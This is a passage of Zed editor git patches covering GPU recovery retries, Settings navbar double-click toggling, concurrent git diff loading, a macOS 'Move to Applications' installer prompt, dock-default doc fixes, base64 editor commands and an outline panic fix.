{} + Err(err) => { + log::warn!("GPU recovery failed, will retry on next frame: {err}"); + } + } - // The current scene references atlas textures that were cleared during recovery. - // Skip this frame and let the next frame rebuild the scene with fresh textures. state.force_render_after_recovery = true; return; } diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index b44ac2faf41821..325d70eb311743 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -1670,16 +1670,13 @@ impl PlatformWindow for X11Window { window_id: self.0.x_window, visual_id: inner.visual_id, }; - inner.renderer.recover(&raw_window).unwrap_or_else(|err| { - panic!( - "GPU device lost and recovery failed. \ - This may happen after system suspend/resume. \ - Please restart the application.\n\nError: {err}" - ) - }); + match inner.renderer.recover(&raw_window) { + Ok(()) => {} + Err(err) => { + log::warn!("GPU recovery failed, will retry on next frame: {err}"); + } + } - // The current scene references atlas textures that were cleared during recovery. - // Skip this frame and let the next frame rebuild the scene with fresh textures. inner.force_render_after_recovery = true; return; } diff --git a/crates/gpui_wgpu/src/wgpu_context.rs b/crates/gpui_wgpu/src/wgpu_context.rs index 80900311b2d11b..d25e1dc71c982a 100644 --- a/crates/gpui_wgpu/src/wgpu_context.rs +++ b/crates/gpui_wgpu/src/wgpu_context.rs @@ -28,6 +28,25 @@ impl WgpuContext { instance: wgpu::Instance, surface: &wgpu::Surface<'_>, compositor_gpu: Option, + ) -> anyhow::Result { + Self::new_with_options(instance, surface, compositor_gpu, false) + } + + #[cfg(not(target_family = "wasm"))] + pub fn new_rejecting_software( + instance: wgpu::Instance, + surface: &wgpu::Surface<'_>, + compositor_gpu: Option, + ) -> anyhow::Result { + Self::new_with_options(instance, surface, compositor_gpu, true) + } + + #[cfg(not(target_family = "wasm"))] + fn new_with_options( + instance: wgpu::Instance, + surface: &wgpu::Surface<'_>, + compositor_gpu: Option, + reject_software: bool, ) -> anyhow::Result { let device_id_filter = match std::env::var("ZED_DEVICE_ID") { Ok(val) => parse_pci_id(&val) @@ -49,6 +68,7 @@ impl WgpuContext { device_id_filter, surface, compositor_gpu.as_ref(), + reject_software, ))?; let device_lost = Arc::new(AtomicBool::new(false)); @@ -197,6 +217,7 @@ impl WgpuContext { device_id_filter: Option, surface: &wgpu::Surface<'_>, compositor_gpu: Option<&CompositorGpuHint>, + reject_software: bool, ) -> anyhow::Result<( wgpu::Adapter, wgpu::Device, @@ -244,12 +265,16 @@ impl WgpuContext { _ => 1, }; - let type_priority: u8 = match info.device_type { - wgpu::DeviceType::DiscreteGpu => 0, - wgpu::DeviceType::IntegratedGpu => 1, - wgpu::DeviceType::Other => 2, - wgpu::DeviceType::VirtualGpu => 3, - wgpu::DeviceType::Cpu => 4, + let type_priority: u8 = if info.device_type == wgpu::DeviceType::Cpu { + 4 + } else { + match info.device_type { + wgpu::DeviceType::DiscreteGpu => 0, + wgpu::DeviceType::IntegratedGpu => 1, + wgpu::DeviceType::Other => 2, + wgpu::DeviceType::VirtualGpu => 3, + wgpu::DeviceType::Cpu => 4, + } }; let backend_priority: u8 = match info.backend { @@ -284,6 +309,16 @@ impl WgpuContext { // Test each adapter by creating a device and configuring the surface for adapter in adapters { let info = adapter.get_info(); + + if reject_software && info.device_type == wgpu::DeviceType::Cpu { + log::info!( + "Skipping software renderer: {} ({:?})", + info.name, + info.backend + ); + continue; + } + log::info!("Testing adapter: {} ({:?})...", info.name, info.backend); match Self::try_adapter_with_surface(&adapter, surface).await { diff --git a/crates/gpui_wgpu/src/wgpu_renderer.rs b/crates/gpui_wgpu/src/wgpu_renderer.rs index 7377c73fea1030..da7e71c726b791 100644 --- a/crates/gpui_wgpu/src/wgpu_renderer.rs +++ b/crates/gpui_wgpu/src/wgpu_renderer.rs @@ -1097,15 +1097,16 @@ impl WgpuRenderer { ); // TBD. Does retrying more actually help? - if self.failed_frame_count > 5 { + if self.failed_frame_count > 10 { + panic!("Too many consecutive GPU errors. Last error: {error}"); + } else if self.failed_frame_count > 5 { if let Some(res) = self.resources.as_mut() { res.invalidate_intermediate_textures(); } self.atlas.clear(); self.needs_redraw = true; + self.failed_frame_count = 0; return; - } else if self.failed_frame_count > 10 { - panic!("Too many consecutive GPU errors. Last error: {error}"); } } else { self.failed_frame_count = 0; @@ -1799,12 +1800,16 @@ impl WgpuRenderer { self.resources = None; *gpu_context.borrow_mut() = None; - // Wait for GPU driver to stabilize (350ms copied from windows :shrug:) + // Wait briefly for the GPU driver to stabilize, then try to + // recreate the context without software renderers. If this fails + // the caller should request another frame and retry — the real GPU + // may need more time to come back (e.g. after suspend/resume). std::thread::sleep(std::time::Duration::from_millis(350)); let instance = WgpuContext::instance(Box::new(window.clone())); let surface = create_surface(&instance, window_handle.as_raw())?; - let new_context = WgpuContext::new(instance, &surface, self.compositor_gpu)?; + let new_context = + WgpuContext::new_rejecting_software(instance, &surface, self.compositor_gpu)?; *gpu_context.borrow_mut() = Some(new_context); surface } else { From 57048346ece4b31ccd6bc601a7d9963a63cc6878 Mon Sep 17 00:00:00 2001 From: najeira Date: Tue, 5 May 2026 11:48:49 +0900 Subject: [PATCH 178/231] settings_ui: Toggle root navbar entries on double-click (#55526) Settings navbar root entries can now be expanded or collapsed by double-clicking the row itself. Single-click navigation is preserved, so clicking a root entry still opens the selected Settings page. The double-click handler only toggles on `click_count() == 2`, so triple-clicking the row does not toggle it again. The double-click path reuses the same toggle-and-focus behavior as the disclosure chevron. Testing: - `cargo fmt --check --package settings_ui` - `cargo check -p settings_ui` - `cargo test -p settings_ui` - Manually verified that: - single-clicking a Settings navbar root entry still opens the selected Settings page - double-clicking a Settings navbar root entry expands or collapses it - triple-clicking the row does not toggle the entry again - clicking the disclosure chevron still expands or collapses the entry Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Improved Settings navigation by allowing root navbar entries to expand or collapse on double-click. --- crates/settings_ui/src/settings_ui.rs | 134 ++++++++++++++++++++++++-- 1 file changed, 128 insertions(+), 6 deletions(-) diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index d22687b0b757d4..f17caafce5ea07 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -1727,6 +1727,35 @@ impl SettingsWindow { self.reset_list_state(); } + fn toggle_and_focus_navbar_entry( + &mut self, + nav_entry_index: usize, + window: &mut Window, + cx: &mut Context, + ) { + self.toggle_navbar_entry(nav_entry_index); + window.focus(&self.navbar_entries[nav_entry_index].focus_handle, cx); + cx.notify(); + } + + fn toggle_navbar_entry_on_double_click( + &mut self, + nav_entry_index: usize, + event: &gpui::ClickEvent, + window: &mut Window, + cx: &mut Context, + ) -> bool { + let Some(entry) = self.navbar_entries.get(nav_entry_index) else { + return false; + }; + if !entry.is_root || event.click_count() != 2 { + return false; + } + + self.toggle_and_focus_navbar_entry(nav_entry_index, window, cx); + true + } + fn build_navbar(&mut self, cx: &App) { let mut navbar_entries = Vec::new(); @@ -2740,13 +2769,11 @@ impl SettingsWindow { item.expanded(entry.expanded || this.has_query) .on_toggle(cx.listener( move |this, _, window, cx| { - this.toggle_navbar_entry(entry_index); - window.focus( - &this.navbar_entries[entry_index] - .focus_handle, + this.toggle_and_focus_navbar_entry( + entry_index, + window, cx, ); - cx.notify(); }, )) }) @@ -2755,7 +2782,17 @@ impl SettingsWindow { let subcategory = (!entry.is_root).then_some(entry.title); - cx.listener(move |this, _, window, cx| { + cx.listener(move |this, event: &gpui::ClickEvent, window, cx| { + if this.toggle_navbar_entry_on_double_click( + entry_index, + event, + window, + cx, + ) + { + return; + } + telemetry::event!( "Settings Navigation Clicked", category = category, @@ -4750,6 +4787,91 @@ pub mod test { " ); + #[gpui::test] + fn navbar_double_click_toggle(cx: &mut gpui::TestAppContext) { + let (settings_window, cx) = cx.add_window_view(|window, cx| { + register_settings(cx); + let mut settings_window = parse( + r" + > General* + - General + - Privacy + v Project + - Project Settings + ", + window, + cx, + ); + settings_window.build_content_handles(window, cx); + settings_window + }); + + settings_window.update_in(cx, |settings_window, window, cx| { + let general_idx = settings_window + .navbar_entries + .iter() + .position(|entry| entry.title == "General" && entry.is_root) + .expect("General root entry should exist"); + let privacy_idx = settings_window + .navbar_entries + .iter() + .position(|entry| entry.title == "Privacy" && !entry.is_root) + .expect("Privacy nested entry should exist"); + + let click_event = |click_count| { + gpui::ClickEvent::Mouse(gpui::MouseClickEvent { + down: gpui::MouseDownEvent { + button: gpui::MouseButton::Left, + click_count, + ..Default::default() + }, + up: gpui::MouseUpEvent { + button: gpui::MouseButton::Left, + click_count, + ..Default::default() + }, + }) + }; + + assert!( + !settings_window.toggle_navbar_entry_on_double_click( + general_idx, + &click_event(1), + window, + cx, + ), + "single-clicks should use the normal navigation path" + ); + assert!(!settings_window.navbar_entries[general_idx].expanded); + + assert!(settings_window.toggle_navbar_entry_on_double_click( + general_idx, + &click_event(2), + window, + cx, + )); + assert!(settings_window.navbar_entries[general_idx].expanded); + + assert!( + !settings_window.toggle_navbar_entry_on_double_click( + general_idx, + &click_event(3), + window, + cx, + ), + "triple-clicks should not toggle the entry again" + ); + assert!(settings_window.navbar_entries[general_idx].expanded); + + assert!(!settings_window.toggle_navbar_entry_on_double_click( + privacy_idx, + &click_event(2), + window, + cx, + )); + }); + } + #[gpui::test] async fn test_settings_window_shows_worktrees_from_multiple_workspaces( cx: &mut gpui::TestAppContext, From 3ab6dc5bfbba2fd70908748a6a031d1ccac99430 Mon Sep 17 00:00:00 2001 From: Xiaobo Liu Date: Tue, 5 May 2026 11:06:37 +0800 Subject: [PATCH 179/231] project: Load git diff bases concurrently (#55480) Use `future::join` when loading index and committed text for buffer diff bases, while keeping skipped loads as ready None futures. Release Notes: - N/A Signed-off-by: Xiaobo Liu --- crates/project/src/git_store.rs | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index f5dd3bef95c033..1e347b6af489c8 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -4565,15 +4565,16 @@ impl Repository { &repo_diff_state_updates { let index_text = if current_index_text.is_some() { - backend.load_index_text(repo_path.clone()).await + backend.load_index_text(repo_path.clone()) } else { - None + future::ready(None).boxed() }; let head_text = if current_head_text.is_some() { - backend.load_committed_text(repo_path.clone()).await + backend.load_committed_text(repo_path.clone()) } else { - None + future::ready(None).boxed() }; + let (index_text, head_text) = future::join(index_text, head_text).await; let change = match (current_index_text.as_ref(), current_head_text.as_ref()) { From d635f7b3590fcb4ed14d216dda58d9ccbcd0368c Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Mon, 4 May 2026 21:48:55 -0600 Subject: [PATCH 180/231] Add Move to Applications (#54719) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Release Notes: - Added a prompt to move Zed to /Applications on macOS when run from within the .dmg --- crates/gpui_macos/src/platform.rs | 18 +- crates/zed/src/main.rs | 2 + crates/zed/src/zed.rs | 2 + crates/zed/src/zed/move_to_applications.rs | 320 +++++++++++++++++++++ 4 files changed, 334 insertions(+), 8 deletions(-) create mode 100644 crates/zed/src/zed/move_to_applications.rs diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index 77cf85a8d1d340..92df05b39a7810 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -520,17 +520,19 @@ impl Platform for MacPlatform { } } - fn restart(&self, _binary_path: Option) { + fn restart(&self, binary_path: Option) { use std::os::unix::process::CommandExt as _; let app_pid = std::process::id().to_string(); - let app_path = self - .app_path() - .ok() - // When the app is not bundled, `app_path` returns the - // directory containing the executable. Disregard this - // and get the path to the executable itself. - .and_then(|path| (path.extension()?.to_str()? == "app").then_some(path)) + let app_path = binary_path + .or_else(|| { + self.app_path() + .ok() + // When the app is not bundled, `app_path` returns the + // directory containing the executable. Disregard this + // and get the path to the executable itself. + .and_then(|path| (path.extension()?.to_str()? == "app").then_some(path)) + }) .unwrap_or_else(|| std::env::current_exe().unwrap()); // Wait until this process has exited and then re-open this path. diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index f8023224a3365a..8f417ee08abcbf 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -576,6 +576,8 @@ fn main() { Client::set_global(client.clone(), cx); zed::init(cx); + #[cfg(target_os = "macos")] + zed::move_to_applications::init(cx); project::Project::init(&client, cx); debugger_ui::init(cx); debugger_tools::init(cx); diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index e9da59396092a6..3afd117a015de7 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -3,6 +3,8 @@ pub mod edit_prediction_registry; #[cfg(target_os = "macos")] pub(crate) mod mac_only_instance; mod migrate; +#[cfg(target_os = "macos")] +pub(crate) mod move_to_applications; mod open_listener; mod open_url_modal; mod quick_action_bar; diff --git a/crates/zed/src/zed/move_to_applications.rs b/crates/zed/src/zed/move_to_applications.rs new file mode 100644 index 00000000000000..10bd4b80472353 --- /dev/null +++ b/crates/zed/src/zed/move_to_applications.rs @@ -0,0 +1,320 @@ +use anyhow::{Context as _, Result}; +use db::kvp::KeyValueStore; +use gpui::{ + App, AsyncWindowContext, Context, DismissEvent, EventEmitter, FocusHandle, Focusable, + PromptButton, PromptLevel, Render, WeakEntity, Window, +}; +use std::ffi::OsString; +use std::path::{Path, PathBuf}; +use std::sync::atomic::{AtomicBool, Ordering}; +use ui::{ + ActiveTheme, Color, CommonAnimationExt, Icon, IconName, IconSize, IntoElement, Label, + LabelCommon, LabelSize, ParentElement, Styled, StyledExt, div, h_flex, v_flex, +}; +use util::ResultExt; +use util::command::new_command; +use workspace::{ModalView, MultiWorkspace}; + +const DONT_ASK_AGAIN_KEY: &str = "move_to_applications_dont_ask_again"; +static PROMPTED_THIS_SESSION: AtomicBool = AtomicBool::new(false); + +pub fn init(cx: &mut App) { + let kvp = KeyValueStore::global(cx); + if matches!(kvp.read_kvp(DONT_ASK_AGAIN_KEY), Ok(Some(value)) if value == "true") { + return; + } + + let Some(request) = MoveToApplicationsRequest::new(cx).log_err().flatten() else { + return; + }; + + cx.observe_new(move |_workspace: &mut MultiWorkspace, window, cx| { + let Some(window) = window else { + return; + }; + + if PROMPTED_THIS_SESSION.swap(true, Ordering::AcqRel) { + return; + } + + let request = request.clone(); + cx.spawn_in(window, async move |workspace, cx| { + request.prompt(workspace, cx).await.log_err(); + }) + .detach(); + }) + .detach(); +} + +#[derive(Clone)] +struct MoveToApplicationsRequest { + app_path: PathBuf, +} + +impl MoveToApplicationsRequest { + fn new(cx: &App) -> Result> { + let app_path = match cx.app_path() { + Ok(app_path) => app_path, + Err(_) => return Ok(None), + }; + + if !should_offer_to_move(&app_path) { + return Ok(None); + } + + Ok(Some(Self { app_path })) + } + + async fn prompt( + self, + workspace: WeakEntity, + cx: &mut AsyncWindowContext, + ) -> Result<()> { + let response = cx + .prompt( + PromptLevel::Info, + "Move Zed to Applications?", + Some( + "Zed is running from a temporary location. Move it to Applications to finish installing it.", + ), + &[ + PromptButton::ok("Yes"), + PromptButton::cancel("No"), + PromptButton::new("Don't ask me again"), + ], + ) + .await?; + + match response { + 0 => { + workspace + .update_in(cx, |workspace, window, cx| { + workspace + .toggle_modal(window, cx, |_window, cx| InstallingZedModal::new(cx)); + }) + .ok(); + if let Err(error) = move_to_applications(&self.app_path, cx).await { + workspace + .update_in(cx, |workspace, _window, cx| { + if let Some(modal) = workspace.active_modal::(cx) { + modal.update(cx, |modal, cx| modal.finished(cx)); + } + }) + .ok(); + cx.prompt( + PromptLevel::Critical, + "Failed to move Zed to Applications", + Some(&error.to_string()), + &["Ok"], + ) + .await + .log_err(); + } + } + 2 => { + let kvp = cx.update(|_window, cx| KeyValueStore::global(cx))?; + kvp.write_kvp(DONT_ASK_AGAIN_KEY.to_string(), "true".to_string()) + .await?; + } + _ => {} + } + + Ok(()) + } +} + +pub struct InstallingZedModal { + focus_handle: FocusHandle, + finished: bool, +} + +impl InstallingZedModal { + fn new(cx: &mut Context) -> Self { + Self { + focus_handle: cx.focus_handle(), + finished: false, + } + } + + fn finished(&mut self, cx: &mut Context) { + self.finished = true; + cx.emit(DismissEvent); + } +} + +impl EventEmitter for InstallingZedModal {} + +impl ModalView for InstallingZedModal { + fn on_before_dismiss( + &mut self, + _window: &mut Window, + _: &mut Context, + ) -> workspace::DismissDecision { + workspace::DismissDecision::Dismiss(self.finished) + } + + fn fade_out_background(&self) -> bool { + true + } +} + +impl Focusable for InstallingZedModal { + fn focus_handle(&self, _cx: &App) -> FocusHandle { + self.focus_handle.clone() + } +} + +impl Render for InstallingZedModal { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + let theme = cx.theme(); + + v_flex() + .elevation_3(cx) + .w_80() + .overflow_hidden() + .child( + div() + .px_4() + .py_3() + .border_b_1() + .border_color(theme.colors().border_variant) + .child(Label::new("Installing Zed…")), + ) + .child( + h_flex() + .w_full() + .gap_3() + .px_4() + .py_3() + .bg(theme.colors().editor_background) + .child( + Icon::new(IconName::ArrowCircle) + .size(IconSize::Medium) + .color(Color::Accent) + .with_rotate_animation(3), + ) + .child( + v_flex() + .gap_1() + .child(Label::new("Moving Zed to Applications")) + .child( + Label::new("Zed will reopen when installation is complete.") + .size(LabelSize::Small) + .color(Color::Muted), + ), + ), + ) + } +} + +fn should_offer_to_move(app_path: &Path) -> bool { + app_path.starts_with(Path::new("/Volumes")) + || app_path.to_string_lossy().contains("/AppTranslocation/") +} + +async fn move_to_applications(app_path: &Path, cx: &mut AsyncWindowContext) -> Result<()> { + let destination_path = install_destination(app_path).await?; + restart_into(destination_path, cx) +} + +async fn install_destination(app_path: &Path) -> Result { + let app_name = app_path + .file_name() + .context("invalid app path: missing app bundle name")?; + + let system_destination = Path::new("/Applications").join(app_name); + if system_destination.exists() { + copy_app_bundle(app_path, &system_destination) + .await + .with_context(|| { + format!( + "failed to replace existing app at {}", + system_destination.display() + ) + })?; + return Ok(system_destination); + } + + if let Some(user_destination) = user_applications_directory().map(|path| path.join(app_name)) + && user_destination.exists() + { + copy_app_bundle(app_path, &user_destination) + .await + .with_context(|| { + format!( + "failed to replace existing app at {}", + user_destination.display() + ) + })?; + return Ok(user_destination); + } + + match copy_app_bundle(app_path, &system_destination).await { + Ok(()) => Ok(system_destination), + Err(system_error) => { + let user_applications_directory = user_applications_directory() + .context("could not determine a writable Applications directory")?; + smol::fs::create_dir_all(&user_applications_directory) + .await + .with_context(|| { + format!("failed to create {}", user_applications_directory.display()) + })?; + let user_destination = user_applications_directory.join(app_name); + copy_app_bundle(app_path, &user_destination) + .await + .with_context(|| { + format!( + "failed to copy app to {} after system Applications copy failed: {system_error:#}", + user_destination.display() + ) + })?; + Ok(user_destination) + } + } +} + +async fn copy_app_bundle(source: &Path, destination: &Path) -> Result<()> { + let parent = destination + .parent() + .context("invalid destination path: missing parent directory")?; + smol::fs::create_dir_all(parent) + .await + .with_context(|| format!("failed to create {}", parent.display()))?; + + let mut source_with_contents: OsString = source.into(); + source_with_contents.push("/"); + let mut destination_with_contents: OsString = destination.into(); + destination_with_contents.push("/"); + + let mut command = new_command("rsync"); + command + .args(["-a", "--delete"]) + .arg(&source_with_contents) + .arg(&destination_with_contents); + let output = command + .output() + .await + .with_context(|| format!("failed to run rsync for {}", source.display()))?; + + anyhow::ensure!( + output.status.success(), + "failed to copy app bundle: {}", + String::from_utf8_lossy(&output.stderr) + ); + + Ok(()) +} + +fn restart_into(app_path: PathBuf, cx: &mut AsyncWindowContext) -> Result<()> { + cx.update(|_window, cx| { + cx.set_restart_path(app_path); + cx.restart(); + })?; + Ok(()) +} + +fn user_applications_directory() -> Option { + std::env::var_os("HOME") + .map(PathBuf::from) + .map(|home| home.join("Applications")) +} From 408198a537659bc3f4b1d6c0c7efdc02dca9a969 Mon Sep 17 00:00:00 2001 From: js <46874769+javier-solis@users.noreply.github.com> Date: Mon, 4 May 2026 20:59:02 -0700 Subject: [PATCH 181/231] Update panel dock default values in settings docs (#55719) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The [Parallel Agents release](https://zed.dev/blog/parallel-agents) introduced a new default layout: the agent panel now docks on the left, while the project, git, outline, and collaboration panels now dock on the right. The rustdoc comments in `crates/settings_content` were not updated to reflect this change. This PR corrects the `Default:` values in the following structs: - `ProjectPanelSettingsContent.dock`: `left` → `right` - `GitPanelSettingsContent.dock`: `left` → `right` - `PanelSettingsContent.dock` (collaboration panel): `left` → `right` - `OutlinePanelSettingsContent.dock`: `left` → `right` - `AgentSettingsContent.dock`: `right` → `left` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/settings_content/src/agent.rs | 2 +- crates/settings_content/src/settings_content.rs | 6 +++--- crates/settings_content/src/workspace.rs | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 26b563e0842708..431937dce30c89 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -84,7 +84,7 @@ pub struct AgentSettingsContent { pub button: Option, /// Where to dock the agent panel. /// - /// Default: right + /// Default: left pub dock: Option, /// Whether the agent panel should use flexible (proportional) sizing. /// diff --git a/crates/settings_content/src/settings_content.rs b/crates/settings_content/src/settings_content.rs index 02fe409c6325af..1124e2ac942605 100644 --- a/crates/settings_content/src/settings_content.rs +++ b/crates/settings_content/src/settings_content.rs @@ -647,7 +647,7 @@ pub struct GitPanelSettingsContent { pub button: Option, /// Where to dock the panel. /// - /// Default: left + /// Default: right pub dock: Option, /// Default width of the panel in pixels. /// @@ -756,7 +756,7 @@ pub struct PanelSettingsContent { pub button: Option, /// Where to dock the panel. /// - /// Default: left + /// Default: right pub dock: Option, /// Default width of the panel in pixels. /// @@ -998,7 +998,7 @@ pub struct OutlinePanelSettingsContent { pub default_width: Option, /// The position of outline panel /// - /// Default: left + /// Default: right pub dock: Option, /// Whether to show file icons in the outline panel. /// diff --git a/crates/settings_content/src/workspace.rs b/crates/settings_content/src/workspace.rs index 19e08e19f34dd1..7ff1f543c80155 100644 --- a/crates/settings_content/src/workspace.rs +++ b/crates/settings_content/src/workspace.rs @@ -705,7 +705,7 @@ pub struct ProjectPanelSettingsContent { pub default_width: Option, /// The position of project panel /// - /// Default: left + /// Default: right pub dock: Option, /// Spacing between worktree entries in the project panel. /// From 6c6a2d5fbefb6b9f226f2d4c3c1857587a21a3b3 Mon Sep 17 00:00:00 2001 From: Chris Kievit Date: Tue, 5 May 2026 06:36:18 +0200 Subject: [PATCH 182/231] editor: Add base64 encode/decode commands (#55361) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Adds `editor: convert to base64` and `editor: convert from base64` to the command palette. Both commands operate on the current selection, or the word under the cursor when nothing is selected. The decode command silently no-ops on invalid base64 input or non-UTF-8 decoded bytes, consistent with how other convert commands handle untransformable input. Release Notes: - Added `editor: convert to base64` and `editor: convert from base64` commands to the command palette --------- Co-authored-by: Christopher Biscardi --- Cargo.lock | 1 + crates/editor/Cargo.toml | 1 + crates/editor/src/actions.rs | 4 ++++ crates/editor/src/editor.rs | 29 ++++++++++++++++++++++++++ crates/editor/src/editor_tests.rs | 34 +++++++++++++++++++++++++++++++ crates/editor/src/element.rs | 2 ++ 6 files changed, 71 insertions(+) diff --git a/Cargo.lock b/Cargo.lock index 26c34c1fcc3184..083aeeef57b9ed 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -5467,6 +5467,7 @@ dependencies = [ "aho-corasick", "anyhow", "assets", + "base64 0.22.1", "breadcrumbs", "buffer_diff", "client", diff --git a/crates/editor/Cargo.toml b/crates/editor/Cargo.toml index c88d1d2c4cd052..813a8a9bc510f3 100644 --- a/crates/editor/Cargo.toml +++ b/crates/editor/Cargo.toml @@ -34,6 +34,7 @@ test-support = [ aho-corasick.workspace = true anyhow.workspace = true assets.workspace = true +base64.workspace = true breadcrumbs.workspace = true client.workspace = true clock.workspace = true diff --git a/crates/editor/src/actions.rs b/crates/editor/src/actions.rs index ccd60186523a32..01f52e7064d0b5 100644 --- a/crates/editor/src/actions.rs +++ b/crates/editor/src/actions.rs @@ -460,6 +460,10 @@ actions!( ConvertToRot13, /// Applies ROT47 cipher to selected text. ConvertToRot47, + /// Base64-encodes the selected text or word under cursor. + ConvertToBase64, + /// Base64-decodes the selected text or word under cursor. + ConvertFromBase64, /// Copies selected text to the clipboard. Copy, /// Copies selected text to the clipboard with leading/trailing whitespace trimmed. diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index ea38200cfe7686..af8d6f6ccc6931 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -13362,6 +13362,35 @@ impl Editor { }) } + pub fn convert_to_base64( + &mut self, + _: &ConvertToBase64, + window: &mut Window, + cx: &mut Context, + ) { + use base64::Engine as _; + self.manipulate_text(window, cx, |text| { + base64::engine::general_purpose::STANDARD.encode(text) + }) + } + + pub fn convert_from_base64( + &mut self, + _: &ConvertFromBase64, + window: &mut Window, + cx: &mut Context, + ) { + use base64::Engine as _; + self.manipulate_text( + window, + cx, + |text| match base64::engine::general_purpose::STANDARD.decode(text) { + Ok(bytes) => String::from_utf8(bytes).unwrap_or_else(|_| text.to_string()), + Err(_) => text.to_string(), + }, + ) + } + fn manipulate_text(&mut self, window: &mut Window, cx: &mut Context, mut callback: Fn) where Fn: FnMut(&str) -> String, diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 03f332821a8346..304f44d3c38b1b 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -6864,6 +6864,40 @@ async fn test_convert_to_sentence_case(cx: &mut TestAppContext) { "}); } +#[gpui::test] +async fn test_convert_to_base64(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + + let mut cx = EditorTestContext::new(cx).await; + + // Encode a plain text selection + cx.set_state(indoc! {" + «helloˇ» + "}); + cx.update_editor(|e, window, cx| e.convert_to_base64(&ConvertToBase64, window, cx)); + cx.assert_editor_state(indoc! {" + «aGVsbG8=ˇ» + "}); + + // Decode a valid base64 selection + cx.set_state(indoc! {" + «aGVsbG8=ˇ» + "}); + cx.update_editor(|e, window, cx| e.convert_from_base64(&ConvertFromBase64, window, cx)); + cx.assert_editor_state(indoc! {" + «helloˇ» + "}); + + // Decode invalid base64 — should leave text unchanged + cx.set_state(indoc! {" + «not!!!ˇ» + "}); + cx.update_editor(|e, window, cx| e.convert_from_base64(&ConvertFromBase64, window, cx)); + cx.assert_editor_state(indoc! {" + «not!!!ˇ» + "}); +} + #[gpui::test] async fn test_manipulate_text(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index a8c0d443d7e0cf..9db33bb9ba7e84 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -555,6 +555,8 @@ impl EditorElement { register_action(editor, window, Editor::toggle_case); register_action(editor, window, Editor::convert_to_rot13); register_action(editor, window, Editor::convert_to_rot47); + register_action(editor, window, Editor::convert_to_base64); + register_action(editor, window, Editor::convert_from_base64); register_action(editor, window, Editor::delete_to_previous_word_start); register_action(editor, window, Editor::delete_to_previous_subword_start); register_action(editor, window, Editor::delete_to_next_word_end); From 05614d5581e142d4525a688314365b763abe0055 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Tue, 5 May 2026 07:10:46 +0200 Subject: [PATCH 183/231] outline: Fix panic due to stale outline hover selection (#55674) Fixes ZED-687 Release Notes: - N/A or Added/Fixed/Improved ... --- crates/outline/src/outline.rs | 76 ++++++++++++++++++++++++++++++++++- 1 file changed, 74 insertions(+), 2 deletions(-) diff --git a/crates/outline/src/outline.rs b/crates/outline/src/outline.rs index 78c4d9c148eec3..1f88c12a2b7301 100644 --- a/crates/outline/src/outline.rs +++ b/crates/outline/src/outline.rs @@ -231,10 +231,14 @@ impl OutlineViewDelegate { cx: &mut Context>, ) { + let Some(selected_match) = self.matches.get(ix) else { + self.selected_match_index = self.matches.len(); + return; + }; + self.selected_match_index = ix; - if navigate && !self.matches.is_empty() { - let selected_match = &self.matches[self.selected_match_index]; + if navigate { let outline_item = &self.outline.items[selected_match.candidate_id]; self.active_editor.update(cx, |active_editor, cx| { @@ -269,6 +273,10 @@ impl PickerDelegate for OutlineViewDelegate { self.selected_match_index } + fn can_select(&self, ix: usize, _window: &mut Window, _cx: &mut Context>) -> bool { + ix < self.matches.len() + } + fn set_selected_index( &mut self, ix: usize, @@ -704,6 